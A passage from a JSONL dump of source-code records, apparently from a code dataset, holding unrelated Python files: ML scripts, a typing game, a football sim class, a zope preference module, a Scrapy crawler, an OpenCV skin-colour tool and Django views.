('crop', 'pad'):\n raise ValueError('Method must be \"crop\" or \"pad\"')\n self.method = method\n\n def apply_transform(self, subject: Subject) -> Subject:\n source_shape = np.array(subject.spatial_shape, np.uint16)\n function = np.floor if self.method == 'crop' else np.ceil\n integer_ratio = function(source_shape / self.target_multiple)\n target_shape = integer_ratio * self.target_multiple\n target_shape = np.maximum(target_shape, 1)\n return CropOrPad(target_shape.astype(int))(subject)\n","sub_path":"torchio/transforms/preprocessing/spatial/ensure_shape_multiple.py","file_name":"ensure_shape_multiple.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"445005659","text":"import linear_regression as rg\nimport dataprocessing as dp\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Loading training examples\nX = dp.load_data('linearX.csv')\ny = dp.load_data('linearY.csv')\n\nX = X.reshape((-1, 1))\n\n#Normalizing the training examples\nX, meu, sigma = dp.normalize(X)\n\n#Initialising parameters for gradient descent\nm, n = X.shape\ninit_theta = np.zeros(n + 1)\nepsilon = 1e-10\neta = [0.001, 0.005, 0.009, 0.013, 0.017]\ncolor = ['red', 'blue', 'green', 'yellow', 'magenta']\n\nplt.ion()\nfor i in range(len(eta)): \n# Executing gradient descent\n\ttheta, iterations, theta_history, cost_history = rg.linear_reg(X, y, init_theta, eta[i], epsilon)\n\tplt.plot(list(range(0, iterations + 1)), cost_history, color=color[i], label='eta = ' + str(eta[i]))\n\nplt.xlabel('iterations')\nplt.ylabel('Cost')\nplt.title('Cost vs iterations')\nplt.legend(loc=1)\nplt.show()\n\ninput('Enter to close:')","sub_path":"Assign1/learning_rate.py","file_name":"learning_rate.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"258778664","text":"import sys\nimport random\nimport time\nimport os\nimport threading as thr\nimport asyncio\nimport sqlfunc\n\nMENU = {'1':10, '2':30, '3':50, '4':100, '5':sys.exit}\n\nclass EnKeyIn(sqlfunc.Sql_Create):\n \n def __init__(self):\n super().__init__()\n self.words = self.sql_find()\n self.complete_time = 0\n self.count_total = 0\n self.error_count = 0\n self.w_quan = 0\n self.error_rate = 0\n #self.judge_thread = 0\n self.time_start = 0\n self.time_end = 0\n\n def menu_select(self):\n ms = input('請選擇單字個數:')\n if ms in '1234':\n self.w_quan = MENU.get(ms)\n self.count_total = MENU.get(ms)\n self.word_quantity(MENU.get(ms))\n else:\n sys.exit()\n \n def word_quantity(self, quan):\n words_temp = random.sample(self.words, k=quan)\n self.time_start = time.time()\n while words_temp:\n try:\n wt = words_temp.pop()\n print()\n print(f\"單字:{wt[1]}\\n翻譯:{wt[2]}\")\n print()\n ei = self.en_input()\n if ei.lower() == wt[1].lower():\n print('ok')\n else:\n self.error_count += 1\n print('error') \n except AttributeError:\n self.error_count += 1\n print('error')\n self.time_end = time.time()\n self.evaluation()\n\n def en_input(self):\n w = input('輸入英文:')\n if w.isalpha():\n return w\n\n def evaluation(self):\n self.complete_time = self.time_end - self.time_start\n self.error_rate = self.error_count / self.w_quan\n print()\n print(f'花費時間:{self.complete_time:06.2f}')\n print(f'錯誤率:{self.error_rate:3.2%}')\n\n def total_average(self):\n pass\n \n\ndef display_ENT():\n act = 'clear' if sys.platform.startswith('linux') else 'cls'\n os.system(act)\n\n\ndef display_view(): \n print('=================')\n print('ENType')\n print('=================')\n print('1. 10個單字')\n print('2. 30個單字')\n print('3. 50個單字')\n print('4. 100個單字')\n print('5. 結束程式')\n print('=================')\n\n\ndisplay_view()\nobj = EnKeyIn()\nobj.menu_select()\n","sub_path":"test/EnType.py","file_name":"EnType.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"184408323","text":"\"\"\" Classes and functions for evaluating teams in the sim.\n\"\"\"\n\noffense_positions = [\"QB\", \"RB1\", \"RB2\", \"FB\", \"WR1\", \"WR2\", \"WR3\",\n \"WR4\", \"WR5\", \"TE1\", \"TE2\", \"LOT\", \"ROT\",\n \"LOG\", \"ROG\", \"C\"]\ndefense_positions = [\"LDE\", \"DT1\", \"DT2\", \"RDE\", \"LOLB\", \"ROLB\",\n \"ILB1\", \"ILB2\", \"CB1\", \"CB2\", \"CB3\", \"CB4\", \"FS\", \"SS\"]\n\nclass Team(object):\n \"\"\" Class for evaluating teams.\n \"\"\"\n\n def __init__(self, name):\n\n # team information\n self.name = name\n\n # player management\n self._players = []\n self._offense = {}\n self._defense = {}\n\n def __repr__(self):\n \"\"\" Representation of instance as a str.\n \"\"\"\n return self.name\n\n def get_players(self, position=None, field_position=None,\n on_field=None, return_dict=False):\n \"\"\" Returns list of players.\n \"\"\"\n\n # check inputs are sane\n if on_field not in [\"offense\", \"defense\", None]:\n raise ValueError(\"Invalid value for on_field:\", on_field)\n\n # if user wants dict with field positions\n if on_field == \"offense\" and return_dict is True:\n return self._offense\n elif on_field == \"defense\" and return_dict is True:\n return self._defense\n elif on_field is False and return_dict is True:\n raise ValueError(\"Must use return_dict with on_field equal True\")\n\n # get Players\n if on_field == \"offense\":\n players = self._offense.values()\n elif on_field == \"defense\":\n players = self._defense.values()\n else:\n players = self._players\n\n # get Players with specific position\n if position is not None:\n players = [p for p in players if p.position == position]\n\n # get Players with specific field position\n if field_position is not None:\n players = [p for p in players\n if p.field_position == field_position]\n\n return players\n\n def add_player(self, player, position=None):\n \"\"\" Adds Player to Team.\n \"\"\"\n if player not in self._players:\n self._players.append(player)\n if position is not None:\n self.sub_player(player, position)\n\n def sub_player(self, player_in, position, player_out=None):\n \"\"\" Subs Player in at a position for another Player.\n \"\"\"\n\n # check that inputs are sane\n if player_in not in self._players or \\\n (player_out not in self._players and player_out is not None):\n raise ValueError(\"Must add player to Team before substituting.\")\n\n # sub in Player\n if position in offense_positions:\n self._offense[position] = player_in\n possession = True\n elif position in defense_positions:\n self._defense[position] = player_in\n possession = False\n else:\n raise ValueError(\"Position is not in known lists:\", position)\n\n # sub out Player\n if possession and player_out is not None:\n position_out = [key for key, val in self._defense.iteritems()\n if val == player_out][0]\n del self._defense[position_out]\n\n # update field positions\n player_in.field_position = position\n if player_out is not None:\n player_out.field_position = None\n\n def get_ballhandler(self):\n \"\"\" Returns the Player with the ball.\n \"\"\"\n ballhandler = [p for p in self.get_players(on_field=\"offense\")\n if p.ball]\n if len(ballhandler) > 1:\n raise IndexError(\"Returned more than one ballhandler\")\n return ballhandler[0]\n","sub_path":"pysport/football/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"222738550","text":"\"\"\"\n\"\"\"\n\n\ndef test_wiki_models_new_version(session):\n \"\"\" creates a new version of the existing page.\n \"\"\"\n\n from pygameweb.wiki.models import Wiki\n link = 'somelink'\n wiki_entry = Wiki(link=link, title='some title', content='some content', latest=1)\n\n session.add(wiki_entry)\n session.commit()\n\n what_changed = 'changed some stuff'\n assert wiki_entry.id\n old_id = wiki_entry.id\n wiki_entry.new_version(session)\n wiki_entry.changes = what_changed\n session.commit()\n\n # we see we have a new database row.\n assert old_id != wiki_entry.id\n\n\n # double check it's ok when we query it.\n new_one = (session\n .query(Wiki)\n .filter(Wiki.link == link)\n .filter(Wiki.latest == 1)\n .first())\n assert new_one.changes == what_changed\n\n pages = (session\n .query(Wiki)\n .filter(Wiki.link == link)\n .all())\n\n assert len(pages) == 2\n assert [p.id for p in pages].count(old_id) == 1\n assert [p.latest for p in pages].count(1) == 1\n assert [p.latest for p in pages].count(0) == 1, 'the old one is there too with latest set to 0'\n","sub_path":"tests/functional/pygameweb/wiki/test_wiki_models.py","file_name":"test_wiki_models.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"258102593","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nfrom subprocess import PIPE, Popen, STDOUT\r\nimport chardet\r\nfrom sys import platform\r\n\r\n\r\nclass SubprocessExecute(object):\r\n @staticmethod\r\n def to_str(bytes_or_str: bytes) -> str:\r\n \"\"\"\r\n 把byte类型转换为str\r\n 查看的编码格式\r\n :param bytes_or_str: bytes数据\r\n :return: 返回字符串\r\n \"\"\"\r\n if isinstance(bytes_or_str, bytes):\r\n encoding_dic = chardet.detect(bytes_or_str)\r\n print(encoding_dic)\r\n encoding = encoding_dic[\"encoding\"]\r\n print(encoding)\r\n value = bytes_or_str.decode(encoding)\r\n # value = bytes_or_str.decode('utf-8')\r\n # value = bytes_or_str.decode('gbk')\r\n else:\r\n value = bytes_or_str\r\n # 先去除每一行末尾的制表符和换行符,然后再加上换行符,使写入文件中的内容不会有空行\r\n return value.strip() + \"\\n\"\r\n\r\n @staticmethod\r\n def to_str2(bytes_or_str):\r\n \"\"\"\r\n 把byte类型转换为str\r\n :param bytes_or_str: bytes数据\r\n :return: 返回字符串\r\n \"\"\"\r\n if isinstance(bytes_or_str, bytes):\r\n try:\r\n value = bytes_or_str.decode('utf-8')\r\n #\r\n except UnicodeDecodeError:\r\n value = bytes_or_str.decode('gbk')\r\n else:\r\n value = bytes_or_str\r\n\r\n return value\r\n\r\n @staticmethod\r\n def to_str3(bytes_or_str):\r\n \"\"\"\r\n 把byte类型转换为str\r\n :param bytes_or_str: bytes数据\r\n :return: 返回字符串\r\n \"\"\"\r\n if isinstance(bytes_or_str, bytes):\r\n if 'linux'.upper() in platform.upper():\r\n value = bytes_or_str.decode('utf-8')\r\n elif ('window' in platform) or ('win32' == platform):\r\n value = bytes_or_str.decode('gbk')\r\n else:\r\n value = bytes_or_str\r\n else:\r\n value = bytes_or_str\r\n\r\n return value\r\n\r\n def execute(self, cmd):\r\n \"\"\"\r\n 执行命令返回结果\r\n :param cmd: 命令\r\n :return: 返回输出\r\n \"\"\"\r\n res = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT)\r\n stderr = res.stderr\r\n stdout = res.stdout\r\n if stderr:\r\n # res_info = stderr.read().decode(\"gbk\")\r\n res_info = self.to_str3(stderr.read())\r\n else:\r\n # res_info = stdout.read().decode(\"gbk\")\r\n res_info = self.to_str3(stdout.read())\r\n\r\n return res_info\r\n\r\n\r\nif __name__ == '__main__':\r\n execute = SubprocessExecute()\r\n # execute.execute(\"python -V\")\r\n execute.execute(\"pip -V\")\r\n","sub_path":"test/subprocess test/command2.py","file_name":"command2.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"623695357","text":"prices = [1, 2, 3, 2, 3]\r\n'''\r\nreturn = [4,3,1,1,0]\r\n다른 해법 : 최초로 더 낮은 값이 있는 경우, 인덱스 값 끼리 빼기\r\n'''\r\nanswer = []\r\n\r\nfor i in range(len(prices)):\r\n for j in range(i+1, len(prices)):\r\n if prices[i] > prices[j]:\r\n seconds = j - i\r\n answer.append(seconds)\r\n break\r\n if j == len(prices)-1:\r\n seconds = j - i\r\n answer.append(seconds)\r\nanswer.append(0)\r\n\r\nprint(answer)\r\n","sub_path":"python_programmers/stackque/stackque1.py","file_name":"stackque1.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"88616418","text":"n = 1001\nmid = n//2+1\ntotal = 1\nnum = 1\nfor i in range(1,mid):\n for j in range(4):\n num = num + 2*i\n print(num)\n total = total + num\nprint(total)","sub_path":"q28.py","file_name":"q28.py","file_ext":"py","file_size_in_byte":169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"249398953","text":"# coding: utf-8\n# author: HotDogDevBr.\n# E-mail: hotdogdevbr@gmail.com.\n\"\"\"\n Escreva o programa (Listagem 4.5) e experimente alguns valores.alguns.\nVerifique se os resultados foram os mesmos do programa anterior (Listagem 4.3)\n\"\"\"\n# listagem 4.5\nidade = int(input(\"Digite a idade de seu carro: \"))\nif idade <= 3:\n print(\"Seu carro é novo\")\nelse:\n print(\"Seu carro é velho\")\n","sub_path":"Exercicios Livro Python/capitulo 4/exercicio 4.5.py","file_name":"exercicio 4.5.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"216112097","text":"##############################################################################\n#\n# Copyright (c) 2005 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"User Preferences System\n\n\"\"\"\n__docformat__ = \"reStructuredText\"\nimport zope.component\nimport zope.component.hooks\nimport zope.interface\nfrom BTrees.OOBTree import OOBTree\nfrom zope.annotation.interfaces import IAnnotations\nfrom zope.container.interfaces import IReadContainer\nfrom zope.location import Location\nfrom zope.schema import getFields\nfrom zope.security.checker import Checker\nfrom zope.security.checker import CheckerPublic\nfrom zope.security.management import getInteraction\nfrom zope.traversing.interfaces import IContainmentRoot\n\nfrom zope.preference.interfaces import IDefaultPreferenceProvider\nfrom zope.preference.interfaces import IPreferenceCategory\nfrom zope.preference.interfaces import IPreferenceGroup\n\n\npref_key = 'zope.app.user.UserPreferences'\n\n\n@zope.interface.implementer(IPreferenceGroup, IReadContainer)\nclass PreferenceGroup(Location):\n \"\"\"A feature-rich ``IPreferenceGroup`` implementation.\n\n This class implements the\n \"\"\"\n\n # Declare attributes here, so that they are always available.\n __id__ = ''\n __schema__ = None\n __title__ = None\n __description__ = None\n\n def __init__(self, id, schema=None, title='', description='',\n isCategory=False):\n self.__id__ = id\n self.__schema__ = schema\n self.__title__ = title\n self.__description__ = description\n\n # The last part of the id is the name.\n self.__name__ = id.split('.')[-1]\n\n # Make sure this group provides all important interfaces.\n directlyProvided = ()\n if isCategory:\n directlyProvided += (IPreferenceCategory,)\n if schema:\n directlyProvided += (schema,)\n zope.interface.directlyProvides(self, directlyProvided)\n\n # Store the actual parent in ``__parent``. Usually we would just override\n # the property to an actual value during binding, but because we overrode\n # ``__setattr__`` this is not possible anymore.\n __parent = None\n\n @property\n def __parent__(self):\n return self.__parent if self.__parent is not None \\\n else zope.component.hooks.getSite()\n\n def __bind__(self, parent):\n clone = self.__class__.__new__(self.__class__)\n clone.__dict__.update(self.__dict__)\n clone.__parent = parent\n return clone\n\n def get(self, key, default=None):\n id = self.__id__ and self.__id__ + '.' + key or key\n group = zope.component.queryUtility(IPreferenceGroup, id, default)\n if group is default:\n return default\n return group.__bind__(self)\n\n def items(self):\n cutoff = self.__id__ and len(self.__id__) + 1 or 0\n utilities = zope.component.getUtilitiesFor(IPreferenceGroup)\n return [(id[cutoff:], group.__bind__(self))\n for id, group in utilities\n if (id != self.__id__ and\n id.startswith(self.__id__) and\n id[cutoff:].find('.') == -1)]\n\n def __getitem__(self, key):\n \"\"\"See zope.container.interfaces.IReadContainer\"\"\"\n default = object()\n obj = self.get(key, default)\n if obj is default:\n raise KeyError(key)\n return obj\n\n def __contains__(self, key):\n \"\"\"See zope.container.interfaces.IReadContainer\"\"\"\n return self.get(key) is not None\n\n def keys(self):\n \"\"\"See zope.container.interfaces.IReadContainer\"\"\"\n return [id for id, group in self.items()]\n\n def __iter__(self):\n \"\"\"See zope.container.interfaces.IReadContainer\"\"\"\n return iter(self.values())\n\n def values(self):\n \"\"\"See zope.container.interfaces.IReadContainer\"\"\"\n return [group for _id, group in self.items()]\n\n def __len__(self):\n \"\"\"See zope.container.interfaces.IReadContainer\"\"\"\n return len(self.items())\n\n def __getattr__(self, key):\n # Try to find a sub-group of the given id\n group = self.get(key)\n if group is not None:\n return group\n\n # Try to find a preference of the given name\n if self.__schema__ and key in self.__schema__:\n marker = object()\n value = self.data.get(key, marker)\n if value is marker:\n # Try to find a default preference provider\n provider = zope.component.queryUtility(\n IDefaultPreferenceProvider,\n context=self\n )\n if provider is None:\n return self.__schema__[key].default\n defaultGroup = provider.getDefaultPreferenceGroup(self.__id__)\n return getattr(defaultGroup, key)\n return value\n\n # Nothing found, raise an attribute error\n raise AttributeError(\"'%s' is not a preference or sub-group.\" % key)\n\n def __setattr__(self, key, value):\n if self.__schema__ and key in self.__schema__:\n # Validate the value\n bound = self.__schema__[key].bind(self)\n bound.validate(value)\n # Assign value\n self.data[key] = value\n else:\n self.__dict__[key] = value\n # If the schema changed, we really need to change the security\n # checker as well.\n if key == '__schema__':\n checker = PreferenceGroupChecker(self)\n self.__dict__['__Security_checker__'] = checker\n\n def __delattr__(self, key):\n if self.__schema__ and key in self.__schema__:\n del self.data[key]\n else:\n del self.__dict__[key]\n\n @property\n def data(self):\n # TODO: what if we have multiple participations?\n principal = getInteraction().participations[0].principal\n ann = zope.component.getMultiAdapter((principal, self), IAnnotations)\n\n # If no preferences exist, create the root preferences object.\n if ann.get(pref_key) is None:\n ann[pref_key] = OOBTree()\n prefs = ann[pref_key]\n\n # If no entry for the group exists, create a new entry.\n if self.__id__ not in prefs.keys():\n prefs[self.__id__] = OOBTree()\n\n return prefs[self.__id__]\n\n\ndef PreferenceGroupChecker(instance):\n \"\"\"A function that generates a custom security checker.\n\n The attributes available in a preference group are dynamically generated\n based on the group schema and the available sub-groups. Thus, the\n permission dictionaries have to be generated at runtime and are unique for\n each preference group instance.\n \"\"\"\n read_perm_dict = {}\n write_perm_dict = {}\n\n # Make sure that the attributes from IPreferenceGroup and IReadContainer\n # are public.\n for attrName in ('__id__', '__schema__', '__title__', '__description__',\n 'get', 'items', 'keys', 'values',\n '__getitem__', '__contains__', '__iter__', '__len__'):\n read_perm_dict[attrName] = CheckerPublic\n\n # Make the attributes generated from the schema available as well.\n if instance.__schema__ is not None:\n for name in getFields(instance.__schema__):\n read_perm_dict[name] = CheckerPublic\n write_perm_dict[name] = CheckerPublic\n\n # Make all sub-groups available as well.\n for name in instance.keys():\n read_perm_dict[name] = CheckerPublic\n write_perm_dict[name] = CheckerPublic\n\n return Checker(read_perm_dict, write_perm_dict)\n\n\ndef UserPreferences(context=None):\n \"\"\"Adapts an ``ILocation`` object to the ``IUserPreferences`` interface.\"\"\"\n if context is None:\n context = zope.component.getSiteManager()\n rootGroup = zope.component.getUtility(IPreferenceGroup)\n rootGroup = rootGroup.__bind__(context)\n rootGroup.__name__ = '++preferences++'\n zope.interface.alsoProvides(rootGroup, IContainmentRoot)\n return rootGroup\n\n\nclass preferencesNamespace:\n \"\"\"Used to traverse to the root preferences group.\"\"\"\n\n def __init__(self, ob, request=None):\n self.context = ob\n\n def traverse(self, name, ignore):\n rootGroup = zope.component.getUtility(IPreferenceGroup)\n rootGroup = rootGroup.__bind__(self.context)\n rootGroup.__name__ = '++preferences++'\n zope.interface.alsoProvides(rootGroup, IContainmentRoot)\n return name and rootGroup[name] or rootGroup\n","sub_path":"src/zope/preference/preference.py","file_name":"preference.py","file_ext":"py","file_size_in_byte":8960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"736515","text":"import string\nimport scrapy\nimport hashlib\n\nclass VideolandCrawler(scrapy.Spider):\n\n name = \"videoland_crawler\"\n\n urls_alfabetic = ['https://www.videoland.com.br/wwwroot/pesquisa.asp?artista=%s&categoria=33&pagina=1' %(letter) for letter in list(string.ascii_uppercase)]\n urls_numeric = ['https://www.videoland.com.br/wwwroot/pesquisa.asp?artista=%s&categoria=33&pagina=1' %(number) for number in range(0, 10)]\n\n start_urls = urls_alfabetic + urls_numeric\n\n # print(start_urls)\n\n def parse(self, response):\n PAGINA_SELECTOR = '//b[contains(., \"Página \")]/text()'\n total_pages = int(response.xpath(\n PAGINA_SELECTOR).extract_first().split()[-1])\n # print(total_pages)\n\n yield scrapy.Request(\n response.url,\n callback=self.parse_page,\n meta={'total_pages': total_pages}\n )\n\n for contador_paginas in range(1, total_pages + 1):\n url_current_page = response.url\n current_page_number = str(url_current_page.split('=')[-1])\n\n url_next_page = ''.join(\n url_current_page.rsplit(\n current_page_number, 1)\n ) + str(contador_paginas)\n\n yield scrapy.Request(\n response.urljoin(url_next_page),\n callback=self.parse_page,\n meta={'total_pages': total_pages}\n )\n\n def parse_page(self, response):\n for contador_musicas in range(2, 42):\n\n CANTOR_SELECTOR = '//tr[{0:d}]/td[1]/font/text()'.format(contador_musicas)\n CODIGO_SELECTOR = '//tr[{0:d}]/td[2]/font/text()'.format(contador_musicas)\n TITULO_SELECTOR = '//tr[{0:d}]/td[3]/font/text()'.format(contador_musicas)\n LETRA_SELECTOR = '//tr[{0:d}]/td[4]/font/text()'.format(contador_musicas)\n IDIOMA_SELECTOR = '//tr[{0:d}]/td[5]/font/text()'.format(contador_musicas)\n PACOTE_SELECTOR = '//tr[{0:d}]/td[6]/font/a/text()'.format(contador_musicas)\n\n url = response.url\n\n total_pages = response.meta.get('total_pages')\n current_page = url.split('=')[-1]\n \n current_artist_search = url.split('=')[-3].split('&')[0]\n\n music_page_order = contador_musicas - 1\n\n cantor = response.xpath(CANTOR_SELECTOR).extract_first()\n codigo = response.xpath(CODIGO_SELECTOR).extract_first()\n titulo = response.xpath(TITULO_SELECTOR).extract_first()\n letra = response.xpath(LETRA_SELECTOR).extract_first()\n idioma = response.xpath(IDIOMA_SELECTOR).extract_first()\n pacote = response.xpath(PACOTE_SELECTOR).extract_first()\n\n # cantor: CANTOR\n # codigo: CÓD\n # titulo: TÍTULO\n # letra: INÍCIO DA LETRA\n # idioma: IDIOMA\n # pacote: PACOTE\n\n yield {\n 'md5': hashlib.md5(\n (\n url + str(total_pages) + cantor + codigo +\n titulo + letra + idioma + pacote\n ).encode('utf-8')\n ).hexdigest(),\n 'url': url,\n 'total_pages': total_pages,\n 'current_page': current_page,\n 'music_page_order': music_page_order,\n 'current_artist_search': current_artist_search,\n 'cantor': cantor,\n 'codigo': codigo,\n 'titulo': titulo,\n 'letra': letra,\n 'idioma': idioma,\n 'pacote': pacote,\n }\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"317278561","text":"import numpy as np\nimport cv2\nimport sys\nfrom KMeans import get_skin_color\n\nMODE = \"RGB\"\n# MODE = \"HSV\"\n\ndef skinRange(H,S,V):\n\te8 = (H<=25) and (H>=0)\n\te9 = (S<174) and (S>58)\n\te10 = (V<=255) and (V>=50)\n\treturn (e8 and e9 and e10)\n\ndef doDiff (img, tar_color, skin_color, size):\n\tprint(\"tar color: {}, skin_color: {}\".format(tar_color, skin_color))\n\tfor i in range(3):\n\t\t_img = img[:, :, i]\n\t\ttar = tar_color[i]\n\t\tsrc = skin_color[i]\n\t\t_img = np.reshape(_img, (_img.shape[0] * _img.shape[1], 1))\n\t\t_img[_img < src] = _img[_img src] = tar + ((255-tar)*(_img[_img>src]-src) / (255-src))\n\t\t_img[_img >= 255] = 255\n\tprint(img.shape)\n\ndef make_lower_upper(skin_color,Hue,Saturation,Value):\n\tif(skin_color[0]>Hue):\n\t\tif(skin_color[0]>(180-Hue)):\n\t\t\tif(skin_color[1]>Saturation+10):\n\t\t\t\tlower1=np.array([skin_color[0]-Hue, skin_color[1]-Saturation,Value], dtype = \"uint8\")\n\t\t\t\tupper1=np.array([180, 255,255], dtype = \"uint8\")\n\t\t\t\tlower2=np.array([0, skin_color[1]-Saturation,Value], dtype = \"uint8\")\n\t\t\t\tupper2=np.array([(skin_color[0]+Hue)%180, 255,255], dtype = \"uint8\")\n\t\t\t\treturn (True,lower1,upper1,lower2,upper2)\n\t\t\telse:\n\t\t\t\tlower1=np.array([skin_color[0]-Hue, 10,Value], dtype = \"uint8\")\n\t\t\t\tupper1=np.array([180, 255,255], dtype = \"uint8\")\n\t\t\t\tlower2=np.array([0, 10,Value], dtype = \"uint8\")\n\t\t\t\tupper2=np.array([(skin_color[0]+Hue)%180, 255,255], dtype = \"uint8\")\n\t\t\t\treturn (True,lower1,upper1,lower2,upper2)\n\t\telse:\n\t\t\tif(skin_color[1]>Saturation+10):\n\t\t\t\tlower=np.array([skin_color[0]-Hue, skin_color[1]-Saturation,Value], dtype = \"uint8\")\n\t\t\t\tupper=np.array([skin_color[0]+Hue, 255,255], dtype = \"uint8\")\n\t\t\t\treturn (False,lower,upper)\n\t\t\telse:\n\t\t\t\tlower=np.array([skin_color[0]-Hue, 10,Value], dtype = \"uint8\")\n\t\t\t\tupper=np.array([skin_color[0]+Hue, 255,255], dtype = \"uint8\")\n\t\t\t\treturn (False,lower,upper)\n\telse:\n\t\tif(skin_color[1]>Saturation+10):\n\t\t\t\tlower1=np.array([0, skin_color[1]-Saturation,Value], dtype = \"uint8\")\n\t\t\t\tupper1=np.array([skin_color[0]+Hue, 255,255], dtype = \"uint8\")\n\t\t\t\tlower2=np.array([180-Hue+skin_color[0], skin_color[1]-Saturation,Value], dtype = \"uint8\")\n\t\t\t\tupper2=np.array([180, 255,255], dtype = \"uint8\")\n\t\t\t\treturn (True,lower1,upper1,lower2,upper2)\n\t\telse:\n\t\t\tlower1=np.array([0, 10,Value], dtype = \"uint8\")\n\t\t\tupper1=np.array([skin_color[0]+Hue, 255,255], dtype = \"uint8\")\n\t\t\tlower2=np.array([180-Hue+skin_color[0], 10,Value], dtype = \"uint8\")\n\t\t\tupper2=np.array([180, 255,255], dtype = \"uint8\")\n\t\t\treturn (True,lower1,upper1,lower2,upper2)\n\ndef change_skin(image_file, tar_color, img_path, seg_path, mode): \n\n\tif(isinstance(image_file,str)):\n\t\timg=cv2.imread(image_file,1)\n\telse:\n\t\timg=cv2.imdecode(np.fromstring(image_file.read(), np.uint8),1)\n\thsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\trgb_img=np.float32(cv2.cvtColor(img,cv2.COLOR_BGR2RGB))\n\tsize=img.shape\n\n\tskin_color, _ = get_skin_color(img_path, seg_path, mode) # HSV\n\n#\tif(skinRange(skin_color[hsvskin_color[1],skin_color[2])): \n\tHue=10\n\tSaturation=65\n\tValue=50\n\tresult=make_lower_upper(skin_color,Hue,Saturation,Value)\n\tif(result[0]):\n\t\tlower1=result[1]\n\t\tupper1=result[2]\n\t\tlower2=result[3]\n\t\tupper2=result[4] \n\t\tskinMask1=cv2.inRange(hsv_img, lower1, upper1)\n\t\tskinMask2=cv2.inRange(hsv_img, lower2, upper2)\n\t\tskinMask=cv2.bitwise_or(skinMask1,skinMask2)\n\telse:\n\t\tlower=result[1]\n\t\tupper=result[2]\n\t\tskinMask = cv2.inRange(hsv_img, lower, upper)\n\t\n\tskinMaskInv=cv2.bitwise_not(skinMask)\n\n\t_skin_color = np.uint8([[skin_color]])\n\t_skin_color = cv2.cvtColor(_skin_color,cv2.COLOR_HSV2RGB)\n\t_skin_color=_skin_color[0][0] # RGB\n\t_skin_color=np.int16(_skin_color)\n\n\t_tar_color = np.uint8([[tar_color]])\n\t_tar_color = cv2.cvtColor(_tar_color, cv2.COLOR_HSV2RGB)\n\t_tar_color = _tar_color[0][0]\n\t_tar_color=np.int16(_tar_color) \n\n\t# Change the color maintaining the texture.\n\tif (MODE == \"HSV\"):\n\t\tdoDiff(hsv_img, tar_color, skin_color, size)\n\t\timg2 = np.uint8(hsv_img)\n\t\timg2 = cv2.cvtColor(img2, cv2.COLOR_HSV2BGR)\n\telif (MODE == \"RGB\"):\n\t\tdoDiff(rgb_img, _tar_color, _skin_color, size)\n\t\timg2 = np.uint8(rgb_img)\n\t\timg2 = cv2.cvtColor(img2, cv2.COLOR_RGB2BGR)\n\n\n\t# Get the two images ie. the skin and the background.\n\timgLeft=cv2.bitwise_and(img,img,mask=skinMaskInv)\n\tskinOver = cv2.bitwise_and(img2, img2, mask = skinMask)\n\tskin = cv2.add(imgLeft,skinOver)\n\n\tres=cv2.imencode('.jpg',skin)[1].tostring()\n\treturn res\n\t\n","sub_path":"Version1/change.py","file_name":"change.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"392624415","text":"import cv2 as cv\nimport os.path\n\nwith open('catsource.txt', 'r') as f:\n for line in f:\n line = line.replace('//', '/')\n line = line.split()\n path = line[0]\n print(path)\n if os.path.isfile(path):\n img = cv.imread(path)\n resized = cv.resize(img, (32,32))\n path = path.replace('cat/', 'resized/')\n cv.imwrite(path, resized)\n","sub_path":"lenet_cat/resizescript.py","file_name":"resizescript.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"485894636","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_GET, require_POST\nfrom .models import Movie, Review\nfrom .forms import MovieForm, ReviewForm\n\n# Create your views here.\n@require_GET\ndef index(request):\n movies = Movie.objects.all()\n context = {\n 'movies': movies,\n }\n return render(request, 'movies/index.html', context)\n\n\ndef create(request):\n if request.method == 'POST':\n movie_form = MovieForm(request.POST)\n if movie_form.is_valid():\n movie_form.save()\n return redirect('movies:index')\n else:\n movie_form = MovieForm()\n context = {'movie_form': movie_form}\n return render(request, 'movies/create.html', context)\n\n\n@require_GET\ndef detail(request, movie_pk):\n movie = 